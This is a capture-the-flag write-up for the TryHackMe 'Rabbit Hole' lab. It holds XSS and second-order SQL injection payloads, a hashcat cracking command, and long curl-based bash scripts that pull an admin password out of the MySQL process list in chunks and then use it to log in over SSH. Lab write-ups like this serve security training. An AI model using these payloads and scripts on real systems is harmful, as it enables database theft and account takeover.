Rabbit Hole
by TryHackMe and shamollash
It's easy to fall into rabbit holes.
Room Link: https://tryhackme.com/r/room/rabbitholeqq
Challenge Description
- IP Address:
10.10.43.190
Reconnaissance
First off, let's perform a nmap scan on the target system
sudo nmap -sC -sV -vv -oA RabbitHole.nmap 10.10.43.190
Here, we see that we have two ports open in our target system
- Port
22 - Port
80
So, let's add the IP address and assign a domain name to the target system from the /etc/hosts file.
10.10.43.190 rabbithole.thm
Now, let's access the web page. Here we see a page asking us to Register and then login into the application from the given links.
Register Page
On the Registering page, we are received with a note of presence of anti-bruteforce measures.
Here, register a user and then click on the login link for the login page.
Login Page
On the Login page, we get a slightly different note saying the There are anti-bruteforce measures in place, implemented with database queries.
now, using the same login credentials that you registered with, login into application.
XSS
Here, we see our username being displaced on the application's page, this leaves us with a doubt of having a XSS in the username field. Therefor, now, let's create a username with the following payload and then login with that same user.
<script>alert("Hacker is Here")</script>
And for sure!!! After we login, we see our Alert message being displayed to us.
Also, in the username field, we see an error being displayed about the SQL query.
Second order SQL Injection
Now, to perform the SQL Injection exploit, we need to create a user with our SQL payload.
In the register page, let's create a username with the following payload of SQL for analyzing the number of columns that our current database has.
/"UNION SELECT 1 -- -
Now, with the same username, login into the application. Here we get no result.
let's try with more number of columns.
/"UNION SELECT 1,2 -- -
And here we get the number of columns that our database currently has. Fine, now, let's enumerate the database that we are working on.
/" UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=DATABASE() --
Here, we get the two tables that is present in our current working database.
Now, let's enumerate the users table to identify the column names.
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 1, 16)-- -
This will only fetch the first 16 characters of the result.
Now, let's get the reset of the result.
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 17, 16)-- -
So, we have the following databases.
id, username, password, group
Now, let's enumerate the usernames from the databse.
/" UNION SELECT 1,`username` FROM users -- -
So, we have the following users in the users table
admin
foo
bar
Hacker
So, now, let's enumerate password of these users.
Admin
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 1, 16) -- -
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 17, 16) -- -
This hash does not match any of the password from the rockyou text file using hash cat.
hashcat -m0 -a0 '<--HASH-->' ~/Pranava__Rao/Tools/Fuzzing\ List/rockyou.txt
Let us now assign the admin access to the Hacker user (the user which we had created).
\" UNION SELECT 1,2; UPDATE users SET group = 'admin' WHERE username = 'Hacker';
Now, the fact that we see the admin user logging in every minute.... makes me curious of there is any background process which is logging in with the admin user's account into the application.
(From this point of the write-up, a bit of help and knowledge was acquired from 0xb0b's writeup on this room, therefor, all the credits and appreciations goes to the blog. Please go read the Blog for more information. Thank you :) )
Direct link: Rabbit Hole
From the blog, we get few files which is really useful for the process of automation of finding the password of the admin user from the backend of the application.
(For more information about the script, you can read through the blog or watch this video: )
adapt the SUBSTRING Parameter to create different users, targeting different blocks:
reg.sh
#!/bin/bash
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 17, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 33, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 49, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 65, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 81, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 97, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 113, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 129, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 145, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 161, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 177, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 193, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/register.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 209, 16) -- -&password=asdf&submit=Submit+Query' \
$'http://rabbithole.thm/register.php'
reg.sh
Now, run the reg.sh file
chmod +x reg.sh
./reg.sh
Now we need to log in with the users. This could also be done using the following script:
login.sh
#!/bin/bash
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 197' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=1' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=2' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 17, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=3' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 33, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=4' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 49, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=5' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 65, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=6' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 81, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=7' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 97, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 113, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=9' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 129, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=10' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 145, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=11' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 161, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=12' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 177, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=13' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 193, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
-H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 199' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=14' \
--data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 209, 16) -- -&password=asdf&login=Submit+Query' \
$'http://rabbithole.thm/login.php'
login.sh
After the users are all logged in, we can query the index page for each user and see the 16 character blocks for each user. Here we can see the queries that get triggered while loading the index page.
curl -s http://rabbithole.thm -H 'Cookie: PHPSESSID=1' | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g'
To automate this, we can use the following script to request for each user and concatenate the results.
get.sh
#!/bin/bash
# Initialize an empty variable to store concatenated output
result=""
# Loop through each session ID from 1 to 14
for i in {1..14}; do
# Get the relevant data and strip HTML tags
output=$(curl -s http://rabbithole.thm -H "Cookie: PHPSESSID=$i" | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g')
result+="$output"
done
# Print the final concatenated result
echo "$result"
get.sh
chmod +x get.sh
./get.sh
Here we get the password of the admin user which we can use it for the ssh.
Now, using the same password, let's ssh into the system.
And Here we find the password of the admin user.
Interactive Graph